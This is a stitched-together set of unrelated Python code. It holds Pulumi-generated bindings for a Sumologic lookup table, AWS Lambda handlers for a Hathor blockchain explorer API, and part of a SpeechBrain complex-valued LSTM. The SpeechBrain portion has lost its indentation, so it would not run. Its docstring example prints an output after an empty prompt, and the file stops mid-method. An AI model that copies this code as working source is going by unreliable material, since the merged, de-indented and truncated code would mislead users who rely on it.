    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter(name="parentFolderId")
    def parent_folder_id(self) -> Optional[pulumi.Input[str]]:
        """
        The parent-folder-path identifier of the lookup table in the Library.
        """
        return pulumi.get(self, "parent_folder_id")

    @parent_folder_id.setter
    def parent_folder_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "parent_folder_id", value)

    @property
    @pulumi.getter(name="primaryKeys")
    def primary_keys(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        The primary key field names.
        """
        return pulumi.get(self, "primary_keys")

    @primary_keys.setter
    def primary_keys(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "primary_keys", value)

    @property
    @pulumi.getter(name="sizeLimitAction")
    def size_limit_action(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "size_limit_action")

    @size_limit_action.setter
    def size_limit_action(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "size_limit_action", value)

    @property
    @pulumi.getter
    def ttl(self) -> Optional[pulumi.Input[int]]:
        """
        A time to live for each entry in the lookup table (in minutes). 365 days is the maximum time to live for each entry that you can specify. Setting it to 0 means that the records will not expire automatically.
        """
        return pulumi.get(self, "ttl")

    @ttl.setter
    def ttl(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "ttl", value)
@pulumi.input_type
class _LookupTableState:
    def __init__(__self__, *,
                 description: Optional[pulumi.Input[str]] = None,
                 fields: Optional[pulumi.Input[Sequence[pulumi.Input['LookupTableFieldArgs']]]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 parent_folder_id: Optional[pulumi.Input[str]] = None,
                 primary_keys: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 size_limit_action: Optional[pulumi.Input[str]] = None,
                 ttl: Optional[pulumi.Input[int]] = None):
        """
        Input properties used for looking up and filtering LookupTable resources.
        :param pulumi.Input[str] description: The description of the lookup table.
        :param pulumi.Input[Sequence[pulumi.Input['LookupTableFieldArgs']]] fields: The list of fields in the lookup table.
        :param pulumi.Input[str] name: The name of the lookup table.
        :param pulumi.Input[str] parent_folder_id: The parent-folder-path identifier of the lookup table in the Library.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] primary_keys: The primary key field names.
        :param pulumi.Input[int] ttl: A time to live for each entry in the lookup table (in minutes). 365 days is the maximum time to live for each entry that you can specify. Setting it to 0 means that the records will not expire automatically.
        """
        if description is not None:
            pulumi.set(__self__, "description", description)
        if fields is not None:
            pulumi.set(__self__, "fields", fields)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if parent_folder_id is not None:
            pulumi.set(__self__, "parent_folder_id", parent_folder_id)
        if primary_keys is not None:
            pulumi.set(__self__, "primary_keys", primary_keys)
        if size_limit_action is not None:
            pulumi.set(__self__, "size_limit_action", size_limit_action)
        if ttl is not None:
            pulumi.set(__self__, "ttl", ttl)

    @property
    @pulumi.getter
    def description(self) -> Optional[pulumi.Input[str]]:
        """
        The description of the lookup table.
        """
        return pulumi.get(self, "description")

    @description.setter
    def description(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "description", value)

    @property
    @pulumi.getter
    def fields(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['LookupTableFieldArgs']]]]:
        """
        The list of fields in the lookup table.
        """
        return pulumi.get(self, "fields")

    @fields.setter
    def fields(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['LookupTableFieldArgs']]]]):
        pulumi.set(self, "fields", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        The name of the lookup table.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter(name="parentFolderId")
    def parent_folder_id(self) -> Optional[pulumi.Input[str]]:
        """
        The parent-folder-path identifier of the lookup table in the Library.
        """
        return pulumi.get(self, "parent_folder_id")

    @parent_folder_id.setter
    def parent_folder_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "parent_folder_id", value)

    @property
    @pulumi.getter(name="primaryKeys")
    def primary_keys(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        The primary key field names.
        """
        return pulumi.get(self, "primary_keys")

    @primary_keys.setter
    def primary_keys(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "primary_keys", value)

    @property
    @pulumi.getter(name="sizeLimitAction")
    def size_limit_action(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "size_limit_action")

    @size_limit_action.setter
    def size_limit_action(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "size_limit_action", value)

    @property
    @pulumi.getter
    def ttl(self) -> Optional[pulumi.Input[int]]:
        """
        A time to live for each entry in the lookup table (in minutes). 365 days is the maximum time to live for each entry that you can specify. Setting it to 0 means that the records will not expire automatically.
        """
        return pulumi.get(self, "ttl")

    @ttl.setter
    def ttl(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "ttl", value)
class LookupTable(pulumi.CustomResource):
    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 description: Optional[pulumi.Input[str]] = None,
                 fields: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['LookupTableFieldArgs']]]]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 parent_folder_id: Optional[pulumi.Input[str]] = None,
                 primary_keys: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 size_limit_action: Optional[pulumi.Input[str]] = None,
                 ttl: Optional[pulumi.Input[int]] = None,
                 __props__=None):
        """
        Provides a [Sumologic Lookup Table](https://help.sumologic.com/05Search/Lookup_Tables).

        ## Example Usage

        ```python
        import pulumi
        import pulumi_sumologic as sumologic

        lookup_table = sumologic.LookupTable("lookupTable",
            description="some description",
            fields=[
                sumologic.LookupTableFieldArgs(
                    field_name="FieldName1",
                    field_type="boolean",
                ),
                sumologic.LookupTableFieldArgs(
                    field_name="FieldName2",
                    field_type="string",
                ),
            ],
            parent_folder_id="<personal folder id>",
            primary_keys=["FieldName1"],
            size_limit_action="DeleteOldData",
            ttl=100)
        ```

        ## Attributes reference

        The following attributes are exported:

        - `id` - Unique identifier for the partition.

        ## Import

        Lookup Tables can be imported using the id, e.g.

        ```sh
        $ pulumi import sumologic:index/lookupTable:LookupTable test 1234567890
        ```

        [1]: https://help.sumologic.com/05Search/Lookup_Tables

        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] description: The description of the lookup table.
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['LookupTableFieldArgs']]]] fields: The list of fields in the lookup table.
        :param pulumi.Input[str] name: The name of the lookup table.
        :param pulumi.Input[str] parent_folder_id: The parent-folder-path identifier of the lookup table in the Library.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] primary_keys: The primary key field names.
        :param pulumi.Input[int] ttl: A time to live for each entry in the lookup table (in minutes). 365 days is the maximum time to live for each entry that you can specify. Setting it to 0 means that the records will not expire automatically.
        """
        ...

    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: LookupTableArgs,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        Provides a [Sumologic Lookup Table](https://help.sumologic.com/05Search/Lookup_Tables).

        ## Example Usage

        ```python
        import pulumi
        import pulumi_sumologic as sumologic

        lookup_table = sumologic.LookupTable("lookupTable",
            description="some description",
            fields=[
                sumologic.LookupTableFieldArgs(
                    field_name="FieldName1",
                    field_type="boolean",
                ),
                sumologic.LookupTableFieldArgs(
                    field_name="FieldName2",
                    field_type="string",
                ),
            ],
            parent_folder_id="<personal folder id>",
            primary_keys=["FieldName1"],
            size_limit_action="DeleteOldData",
            ttl=100)
        ```

        ## Attributes reference

        The following attributes are exported:

        - `id` - Unique identifier for the partition.

        ## Import

        Lookup Tables can be imported using the id, e.g.

        ```sh
        $ pulumi import sumologic:index/lookupTable:LookupTable test 1234567890
        ```

        [1]: https://help.sumologic.com/05Search/Lookup_Tables

        :param str resource_name: The name of the resource.
        :param LookupTableArgs args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        ...

    def __init__(__self__, resource_name: str, *args, **kwargs):
        resource_args, opts = _utilities.get_resource_args_opts(LookupTableArgs, pulumi.ResourceOptions, *args, **kwargs)
        if resource_args is not None:
            __self__._internal_init(resource_name, opts, **resource_args.__dict__)
        else:
            __self__._internal_init(resource_name, *args, **kwargs)

    def _internal_init(__self__,
                       resource_name: str,
                       opts: Optional[pulumi.ResourceOptions] = None,
                       description: Optional[pulumi.Input[str]] = None,
                       fields: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['LookupTableFieldArgs']]]]] = None,
                       name: Optional[pulumi.Input[str]] = None,
                       parent_folder_id: Optional[pulumi.Input[str]] = None,
                       primary_keys: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                       size_limit_action: Optional[pulumi.Input[str]] = None,
                       ttl: Optional[pulumi.Input[int]] = None,
                       __props__=None):
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        if opts.id is None:
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = LookupTableArgs.__new__(LookupTableArgs)

            if description is None and not opts.urn:
                raise TypeError("Missing required property 'description'")
            __props__.__dict__["description"] = description
            __props__.__dict__["fields"] = fields
            __props__.__dict__["name"] = name
            __props__.__dict__["parent_folder_id"] = parent_folder_id
            __props__.__dict__["primary_keys"] = primary_keys
            __props__.__dict__["size_limit_action"] = size_limit_action
            __props__.__dict__["ttl"] = ttl
        super(LookupTable, __self__).__init__(
            'sumologic:index/lookupTable:LookupTable',
            resource_name,
            __props__,
            opts)

    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None,
            description: Optional[pulumi.Input[str]] = None,
            fields: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['LookupTableFieldArgs']]]]] = None,
            name: Optional[pulumi.Input[str]] = None,
            parent_folder_id: Optional[pulumi.Input[str]] = None,
            primary_keys: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
            size_limit_action: Optional[pulumi.Input[str]] = None,
            ttl: Optional[pulumi.Input[int]] = None) -> 'LookupTable':
        """
        Get an existing LookupTable resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.

        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] description: The description of the lookup table.
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['LookupTableFieldArgs']]]] fields: The list of fields in the lookup table.
        :param pulumi.Input[str] name: The name of the lookup table.
        :param pulumi.Input[str] parent_folder_id: The parent-folder-path identifier of the lookup table in the Library.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] primary_keys: The primary key field names.
        :param pulumi.Input[int] ttl: A time to live for each entry in the lookup table (in minutes). 365 days is the maximum time to live for each entry that you can specify. Setting it to 0 means that the records will not expire automatically.
        """
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))

        __props__ = _LookupTableState.__new__(_LookupTableState)

        __props__.__dict__["description"] = description
        __props__.__dict__["fields"] = fields
        __props__.__dict__["name"] = name
        __props__.__dict__["parent_folder_id"] = parent_folder_id
        __props__.__dict__["primary_keys"] = primary_keys
        __props__.__dict__["size_limit_action"] = size_limit_action
        __props__.__dict__["ttl"] = ttl
        return LookupTable(resource_name, opts=opts, __props__=__props__)

    @property
    @pulumi.getter
    def description(self) -> pulumi.Output[str]:
        """
        The description of the lookup table.
        """
        return pulumi.get(self, "description")

    @property
    @pulumi.getter
    def fields(self) -> pulumi.Output[Optional[Sequence['outputs.LookupTableField']]]:
        """
        The list of fields in the lookup table.
        """
        return pulumi.get(self, "fields")

    @property
    @pulumi.getter
    def name(self) -> pulumi.Output[str]:
        """
        The name of the lookup table.
        """
        return pulumi.get(self, "name")

    @property
    @pulumi.getter(name="parentFolderId")
    def parent_folder_id(self) -> pulumi.Output[Optional[str]]:
        """
        The parent-folder-path identifier of the lookup table in the Library.
        """
        return pulumi.get(self, "parent_folder_id")

    @property
    @pulumi.getter(name="primaryKeys")
    def primary_keys(self) -> pulumi.Output[Optional[Sequence[str]]]:
        """
        The primary key field names.
        """
        return pulumi.get(self, "primary_keys")

    @property
    @pulumi.getter(name="sizeLimitAction")
    def size_limit_action(self) -> pulumi.Output[Optional[str]]:
        return pulumi.get(self, "size_limit_action")

    @property
    @pulumi.getter
    def ttl(self) -> pulumi.Output[Optional[int]]:
        """
        A time to live for each entry in the lookup table (in minutes). 365 days is the maximum time to live for each entry that you can specify. Setting it to 0 means that the records will not expire automatically.
        """
        return pulumi.get(self, "ttl")
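The two `__init__` overloads above funnel into one dispatcher that accepts either a typed args object or plain keyword arguments. A hedged, standalone sketch of that dispatch pattern (the `ResourceArgs` and `make_resource` names are hypothetical stand-ins, not Pulumi APIs):

```python
# Illustrative stand-ins only: this mimics the args-object-or-kwargs
# dispatch performed by the generated __init__ above; it is not Pulumi code.
class ResourceArgs:
    def __init__(self, description, name=None):
        self.description = description
        self.name = name

def make_resource(resource_name, *args, **kwargs):
    # A typed args object passed positionally wins; otherwise the keyword
    # arguments are taken as the resource properties directly.
    if args and isinstance(args[0], ResourceArgs):
        props = dict(args[0].__dict__)
    else:
        props = dict(kwargs)
    return {"resource_name": resource_name, **props}

# Both call styles produce the same properties.
r1 = make_resource("table", ResourceArgs(description="demo"))
r2 = make_resource("table", description="demo")
```

This is why `LookupTable.__init__` can forward `**resource_args.__dict__` into `_internal_init`: the args object is just a named bag of the same keyword parameters.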
# Source: HathorNetwork/hathor-explorer-service (MIT): handlers/node_api.py

import json
from typing import Optional

from aws_lambda_context import LambdaContext

from common.errors import ApiError
from usecases.node_api import NodeApi
from utils.wrappers.aws.api_gateway import ApiGateway, ApiGatewayEvent

UNKNOWN_ERROR_MSG = {"error": "unknown_error"}


@ApiGateway()
def get_address_balance(
    event: ApiGatewayEvent,
    _context: LambdaContext,
    node_api: Optional[NodeApi] = None
) -> dict:
    """Get the token balance of a given address.

    *IMPORTANT: Any changes on the parameters should be reflected on the `cacheKeyParameters` for this method.
    """
    node_api = node_api or NodeApi()
    address = event.query.get("address")

    if address is None:
        raise ApiError("invalid_parameters")

    response = node_api.get_address_balance(address)

    return {
        "statusCode": 200,
        "body": json.dumps(response or UNKNOWN_ERROR_MSG),
        "headers": {
            "Content-Type": "application/json"
        }
    }


@ApiGateway()
def get_address_search(
    event: ApiGatewayEvent,
    _context: LambdaContext,
    node_api: Optional[NodeApi] = None
) -> dict:
    """Get a paginated list of transactions for a given address.

    *IMPORTANT: Any changes on the parameters should be reflected on the `cacheKeyParameters` for this method.
    """
    node_api = node_api or NodeApi()
    address = event.query.get("address")
    count = event.query.get("count")
    page = event.query.get("page")
    hash = event.query.get("hash")
    token = event.query.get("token")

    if address is None or count is None:
        raise ApiError("invalid_parameters")

    if hash is not None and page is None:
        # If hash exists, it's a paginated request and page is required
        raise ApiError("invalid_parameters")

    response = node_api.get_address_search(address, count, page, hash, token)

    return {
        "statusCode": 200,
        "body": json.dumps(response or UNKNOWN_ERROR_MSG),
        "headers": {
            "Content-Type": "application/json"
        }
    }


@ApiGateway()
def get_version(
    event: ApiGatewayEvent,
    _context: LambdaContext,
    node_api: Optional[NodeApi] = None
) -> dict:
    """Get the node version settings.

    *IMPORTANT: Any changes on the parameters should be reflected on the `cacheKeyParameters` for this method.
    """
    node_api = node_api or NodeApi()
    response = node_api.get_version()

    return {
        "statusCode": 200,
        "body": json.dumps(response or UNKNOWN_ERROR_MSG),
        "headers": {
            "Content-Type": "application/json"
        }
    }


@ApiGateway()
def get_dashboard_tx(
    event: ApiGatewayEvent,
    _context: LambdaContext,
    node_api: Optional[NodeApi] = None
) -> dict:
    """Get the txs and blocks to be shown on the dashboard.

    *IMPORTANT: Any changes on the parameters should be reflected on the `cacheKeyParameters` for this method.
    """
    node_api = node_api or NodeApi()
    block = event.query.get("block")
    tx = event.query.get("tx")

    if block is None or tx is None:
        raise ApiError("invalid_parameters")

    response = node_api.get_dashboard_tx(block, tx)

    return {
        "statusCode": 200,
        "body": json.dumps(response or UNKNOWN_ERROR_MSG),
        "headers": {
            "Content-Type": "application/json"
        }
    }


@ApiGateway()
def get_transaction_acc_weight(
    event: ApiGatewayEvent,
    _context: LambdaContext,
    node_api: Optional[NodeApi] = None
) -> dict:
    """Get a tx accumulated weight data.

    *IMPORTANT: Any changes on the parameters should be reflected on the `cacheKeyParameters` for this method.
    """
    node_api = node_api or NodeApi()
    id = event.query.get("id")

    if id is None:
        raise ApiError("invalid_parameters")

    response = node_api.get_transaction_acc_weight(id)

    return {
        "statusCode": 200,
        "body": json.dumps(response or UNKNOWN_ERROR_MSG),
        "headers": {
            "Content-Type": "application/json"
        }
    }


@ApiGateway()
def get_token_history(
    event: ApiGatewayEvent,
    _context: LambdaContext,
    node_api: Optional[NodeApi] = None
) -> dict:
    """Get a paginated history of transactions for a given token id.

    *IMPORTANT: Any changes on the parameters should be reflected on the `cacheKeyParameters` for this method.
    """
    node_api = node_api or NodeApi()
    id = event.query.get("id")
    count = event.query.get("count")
    hash = event.query.get("hash")
    page = event.query.get("page")
    timestamp = event.query.get("timestamp")

    if id is None or count is None:
        raise ApiError("invalid_parameters")

    if hash is not None and (page is None or timestamp is None):
        # If hash exists, it's a paginated request and page is required
        raise ApiError("invalid_parameters")

    response = node_api.get_token_history(id, count, hash, page, timestamp)

    return {
        "statusCode": 200,
        "body": json.dumps(response or {}),
        "headers": {
            "Content-Type": "application/json"
        }
    }


@ApiGateway()
def get_transaction(
    event: ApiGatewayEvent,
    _context: LambdaContext,
    node_api: Optional[NodeApi] = None
) -> dict:
    """Get transaction details given a tx_id.

    *IMPORTANT: Any changes on the parameters should be reflected on the `cacheKeyParameters` for this method.
    """
    node_api = node_api or NodeApi()
    id = event.query.get("id")

    if id is None:
        raise ApiError("invalid_parameters")

    response = node_api.get_transaction(id)

    return {
        "statusCode": 200,
        "body": json.dumps(response or UNKNOWN_ERROR_MSG),
        "headers": {
            "Content-Type": "application/json"
        }
    }


@ApiGateway()
def list_transactions(
    event: ApiGatewayEvent,
    _context: LambdaContext,
    node_api: Optional[NodeApi] = None
) -> dict:
    """Get a pagination on blocks or transactions with details.

    *IMPORTANT: Any changes on the parameters should be reflected on the `cacheKeyParameters` for this method.
    """
    node_api = node_api or NodeApi()
    type = event.query.get("type")
    count = event.query.get("count")
    hash = event.query.get("hash")
    page = event.query.get("page")
    timestamp = event.query.get("timestamp")

    if type is None or count is None:
        raise ApiError("invalid_parameters")

    if hash is not None and (page is None or timestamp is None):
        # If hash exists, it's a paginated request and page is required
        raise ApiError("invalid_parameters")

    response = node_api.list_transactions(type, count, hash, page, timestamp)

    return {
        "statusCode": 200,
        "body": json.dumps(response or {}),
        "headers": {
            "Content-Type": "application/json"
        }
    }


@ApiGateway()
def get_token(
    event: ApiGatewayEvent,
    _context: LambdaContext,
    node_api: Optional[NodeApi] = None
) -> dict:
    """Get token details given a token uid.

    *IMPORTANT: Any changes on the parameters should be reflected on the `cacheKeyParameters` for this method.
    """
    node_api = node_api or NodeApi()
    id = event.query.get("id")

    if id is None:
        raise ApiError("invalid_parameters")

    response = node_api.get_token(id)

    return {
        "statusCode": 200,
        "body": json.dumps(response or UNKNOWN_ERROR_MSG),
        "headers": {
            "Content-Type": "application/json"
        }
    }


@ApiGateway()
def list_tokens(
    event: ApiGatewayEvent,
    _context: LambdaContext,
    node_api: Optional[NodeApi] = None
) -> dict:
    """Get a list of tokens with details.

    *IMPORTANT: Any changes on the parameters should be reflected on the `cacheKeyParameters` for this method.
    """
    node_api = node_api or NodeApi()
    response = node_api.list_tokens()

    return {
        "statusCode": 200,
        "body": json.dumps(response or {}),
        "headers": {
            "Content-Type": "application/json"
        }
    }


@ApiGateway()
def decode_tx(
    event: ApiGatewayEvent,
    _context: LambdaContext,
    node_api: Optional[NodeApi] = None
) -> dict:
    """Decode a tx by its struct data hex encoded."""
    node_api = node_api or NodeApi()
    hex_tx = event.query.get("hex_tx")

    if hex_tx is None:
        raise ApiError("invalid_parameters")

    response = node_api.decode_tx(hex_tx)

    return {
        "statusCode": 200,
        "body": json.dumps(response or {}),
        "headers": {
            "Content-Type": "application/json"
        }
    }


@ApiGateway()
def push_tx(
    event: ApiGatewayEvent,
    _context: LambdaContext,
    node_api: Optional[NodeApi] = None
) -> dict:
    """Push a transaction by its struct data hex encoded."""
    node_api = node_api or NodeApi()
    hex_tx = event.query.get("hex_tx")

    if hex_tx is None:
        raise ApiError("invalid_parameters")

    response = node_api.push_tx(hex_tx)

    return {
        "statusCode": 200,
        "body": json.dumps(response or {}),
        "headers": {
            "Content-Type": "application/json"
        }
    }


@ApiGateway()
def graphviz_dot_neighbors(
    event: ApiGatewayEvent,
    _context: LambdaContext,
    node_api: Optional[NodeApi] = None
) -> dict:
    """Generate file with the graph of neighbours of a tx in dot format."""
    node_api = node_api or NodeApi()
    tx = event.query.get("tx")
    graph_type = event.query.get("graph_type")  # verification, funds
    max_level = event.query.get("max_level")

    if tx is None or graph_type is None or max_level is None:
        raise ApiError("invalid_parameters")

    response = node_api.graphviz_dot_neighbors(tx, graph_type, max_level)

    return {
        "statusCode": 200,
        "body": response,
        "headers": {
            "Content-Type": "application/json"
        }
    }
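Every handler in this module follows the same shape: read query parameters, raise `ApiError` when required ones are missing, and wrap the use-case response in an API Gateway proxy result. A reduced, standalone sketch of that pattern (the `FakeEvent` stub and `fetch` callback are hypothetical; the real handlers use `ApiGatewayEvent` and `NodeApi`):

```python
import json

class FakeEvent:
    # Minimal stand-in for ApiGatewayEvent: only the .query mapping is used.
    def __init__(self, query):
        self.query = query

def get_transaction_sketch(event, fetch):
    # Read the required query parameter, failing fast when it is absent.
    tx_id = event.query.get("id")
    if tx_id is None:
        raise ValueError("invalid_parameters")
    response = fetch(tx_id)
    # API Gateway proxy integration expects statusCode/body/headers.
    return {
        "statusCode": 200,
        "body": json.dumps(response or {"error": "unknown_error"}),
        "headers": {"Content-Type": "application/json"},
    }

result = get_transaction_sketch(FakeEvent({"id": "abc"}), lambda i: {"tx_id": i})
```

Note that `body` must be a JSON string, not a dict, which is why every handler above calls `json.dumps` (except `graphviz_dot_neighbors`, whose response is already a string).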
# Source: anonymspeechbrain/speechbrain (Apache-2.0): speechbrain/nnet/complex_networks/c_RNN.py

"""Library implementing complex-valued recurrent neural networks.
Authors
* Anonymous
"""
import torch
import logging
from speechbrain.nnet.complex_networks.c_linear import CLinear
from speechbrain.nnet.complex_networks.c_normalization import (
CBatchNorm,
CLayerNorm,
)
logger = logging.getLogger(__name__)
class CLSTM(torch.nn.Module):
""" This function implements a complex-valued LSTM.
Input format is (batch, time, fea) or (batch, time, fea, channel).
In the latter shape, the two last dimensions will be merged:
(batch, time, fea * channel)
Arguments
---------
hidden_size : int
Number of output neurons (i.e, the dimensionality of the output).
Specified value is in term of complex-valued neurons. Thus, the output
is 2*hidden_size.
num_layers : int, optional
Number of layers to employ in the RNN architecture (default 1).
bias: bool, optional
If True, the additive bias b is adopted (default True).
dropout : float, optional
It is the dropout factor (must be between 0 and 1) (default 0.0).
return_hidden : bool, optional
It True, the function returns the last hidden layer.
bidirectional : bool, optional
If True, a bidirectional model that scans the sequence both
right-to-left and left-to-right is used (default False).
init_criterion : str , optional
(glorot, he).
This parameter controls the initialization criterion of the weights.
It is combined with weights_init to build the initialization method of
the complex-valued weights (default "glorot").
weight_init : str, optional
(complex, unitary).
This parameter defines the initialization procedure of the
complex-valued weights (default "complex"). "complex" will generate random complex-valued
weights following the init_criterion and the complex polar form.
"unitary" will normalize the weights to lie on the unit circle.
More details in: "Deep Complex Networks", Trabelsi C. et al.
Example
-------
>>> inp_tensor = torch.rand([10, 16, 40])
>>> rnn = CLSTM(hidden_size=16, input_shape=inp_tensor.shape)
>>> out_tensor = rnn(inp_tensor)
>>>
torch.Size([10, 16, 32])
"""
def __init__(
self,
hidden_size,
input_shape,
num_layers=1,
bias=True,
dropout=0.0,
bidirectional=False,
return_hidden=False,
init_criterion="glorot",
weight_init="complex",
):
super().__init__()
self.hidden_size = hidden_size * 2
self.num_layers = num_layers
self.bias = bias
self.dropout = dropout
self.bidirectional = bidirectional
self.reshape = False
self.return_hidden = return_hidden
self.init_criterion = init_criterion
self.weight_init = weight_init
if len(input_shape) > 3:
self.reshape = True
# Computing the feature dimensionality
self.fea_dim = torch.prod(torch.tensor(input_shape[2:]))
self.batch_size = input_shape[0]
self.rnn = self._init_layers()
def _init_layers(self):
"""Initializes the layers of the ComplexLSTM."""
rnn = torch.nn.ModuleList([])
current_dim = self.fea_dim
for i in range(self.num_layers):
rnn_lay = CLSTM_Layer(
current_dim,
self.hidden_size,
self.num_layers,
self.batch_size,
dropout=self.dropout,
bidirectional=self.bidirectional,
init_criterion=self.init_criterion,
weight_init=self.weight_init,
)
rnn.append(rnn_lay)
if self.bidirectional:
current_dim = self.hidden_size * 2
else:
current_dim = self.hidden_size
return rnn
def forward(self, x, hx=None):
"""Returns the output of the CLSTM.
Arguments
---------
x : torch.Tensor
Input tensor.
"""
# Reshaping input tensors for 4d inputs
if self.reshape:
if x.ndim == 4:
x = x.reshape(x.shape[0], x.shape[1], x.shape[2] * x.shape[3])
output, hh = self._forward_rnn(x, hx=hx)
if self.return_hidden:
return output, hh
else:
return output
def _forward_rnn(self, x, hx):
"""Returns the output of the CLSTM.
Arguments
---------
x : torch.Tensor
Input tensor.
"""
h = []
if hx is not None:
if self.bidirectional:
hx = hx.reshape(
self.num_layers, self.batch_size * 2, self.hidden_size
)
# Processing the different layers
for i, rnn_lay in enumerate(self.rnn):
if hx is not None:
x = rnn_lay(x, hx=hx[i])
else:
x = rnn_lay(x, hx=None)
h.append(x[:, -1, :])
h = torch.stack(h, dim=1)
if self.bidirectional:
h = h.reshape(h.shape[1] * 2, h.shape[0], self.hidden_size)
else:
h = h.transpose(0, 1)
return x, h
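The bidirectional handling above (flip the sequence, stack it along the batch axis, run the same recurrence, then flip the backward half back and concatenate it feature-wise) can be sketched without torch. This is a hypothetical toy where a scalar cumulative recurrence stands in for the CLSTM layer:

```python
def scan(seq, step, h0=0.0):
    """Run a simple recurrence h = step(h, x) over a sequence."""
    h, out = h0, []
    for x in seq:
        h = step(h, x)
        out.append(h)
    return out

def bidirectional_scan(seq, step):
    """Process the sequence in both directions with the same recurrence,
    re-flip the backward outputs so time steps align, then pair the two
    directions per step (mirroring the flip/cat logic above)."""
    fwd = scan(seq, step)
    bwd = scan(list(reversed(seq)), step)
    bwd.reverse()  # undo the flip so bwd[t] corresponds to fwd[t]
    return list(zip(fwd, bwd))

pairs = bidirectional_scan([1, 2, 3], lambda h, x: h + x)
# pairs == [(1, 6), (3, 5), (6, 3)]: forward cumulative sums paired
# with backward cumulative sums re-aligned in time
```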
class CLSTM_Layer(torch.nn.Module):
""" This function implements complex-valued LSTM layer.
Arguments
---------
input_size : int
Feature dimensionality of the input tensors (in terms of real values).
batch_size : int
Batch size of the input tensors.
hidden_size : int
Number of output values (in terms of real values).
num_layers : int, optional
Number of layers to employ in the RNN architecture (default 1).
dropout : float, optional
It is the dropout factor (must be between 0 and 1) (default 0.0).
bidirectional : bool, optional
If True, a bidirectional model that scans the sequence both
right-to-left and left-to-right is used (default False).
init_criterion : str, optional
(glorot, he).
This parameter controls the initialization criterion of the weights.
It is combined with weight_init to build the initialization method of
the complex-valued weights (default "glorot").
weight_init : str, optional
(complex, unitary).
This parameter defines the initialization procedure of the
complex-valued weights (default "complex"). "complex" will generate random complex-valued
weights following the init_criterion and the complex polar form.
"unitary" will normalize the weights to lie on the unit circle.
More details in: "Deep Complex Networks", Trabelsi C. et al.
"""
def __init__(
self,
input_size,
hidden_size,
num_layers,
batch_size,
dropout=0.0,
bidirectional=False,
init_criterion="glorot",
weight_init="complex",
):
super(CLSTM_Layer, self).__init__()
self.hidden_size = int(hidden_size) // 2  # Expressed in terms of complex numbers
self.input_size = int(input_size)
self.batch_size = batch_size
self.bidirectional = bidirectional
self.dropout = dropout
self.init_criterion = init_criterion
self.weight_init = weight_init
self.w = CLinear(
input_shape=self.input_size,
n_neurons=self.hidden_size * 4, # Forget, Input, Output, Cell
bias=True,
weight_init=self.weight_init,
init_criterion=self.init_criterion,
)
self.u = CLinear(
input_shape=self.hidden_size * 2,  # The recurrent input size is in terms of real values
n_neurons=self.hidden_size * 4,
bias=True,
weight_init=self.weight_init,
init_criterion=self.init_criterion,
)
if self.bidirectional:
self.batch_size = self.batch_size * 2
# Initial state
self.h_init = torch.zeros(1, self.hidden_size * 2, requires_grad=False)
# Preloading dropout masks (gives some speed improvement)
self._init_drop(self.batch_size)
# Initializing dropout
self.drop = torch.nn.Dropout(p=self.dropout, inplace=False)
self.drop_mask_te = torch.tensor([1.0]).float()
def forward(self, x, hx=None):
# type: (Tensor, Optional[Tensor]) -> Tensor # noqa F821
"""Returns the output of the CRNN_layer.
Arguments
---------
x : torch.Tensor
Input tensor.
"""
if self.bidirectional:
x_flip = x.flip(1)
x = torch.cat([x, x_flip], dim=0)
# Change batch size if needed
self._change_batch_size(x)
# Feed-forward affine transformations (all steps in parallel)
w = self.w(x)
# Processing time steps
